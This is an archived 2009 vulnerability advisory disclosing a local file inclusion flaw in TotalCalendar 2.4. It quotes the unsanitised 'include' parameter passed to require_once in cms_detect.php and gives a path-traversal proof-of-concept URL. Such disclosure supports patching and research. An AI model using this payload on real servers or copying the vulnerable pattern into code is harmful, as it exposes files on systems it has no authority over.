[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : TotalCalendar 2.4 (include) Local File Inclusion Vulnerability
# Published : 2009-04-21
# Author : SirGod
# Previous Title : PastelCMS 0.8.0 (LFI/SQL) Multiple Remote Vulnerabilities
# Next Title : NotFTP 1.3.1 (newlang) Local File Inclusion Vulnerability
##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################
[+] Local File Inclusion
Vulnerable code in cms_detect.php:
-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------
PoC :
http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK
##########################################################################################
# www.Syue.com [2009-04-21]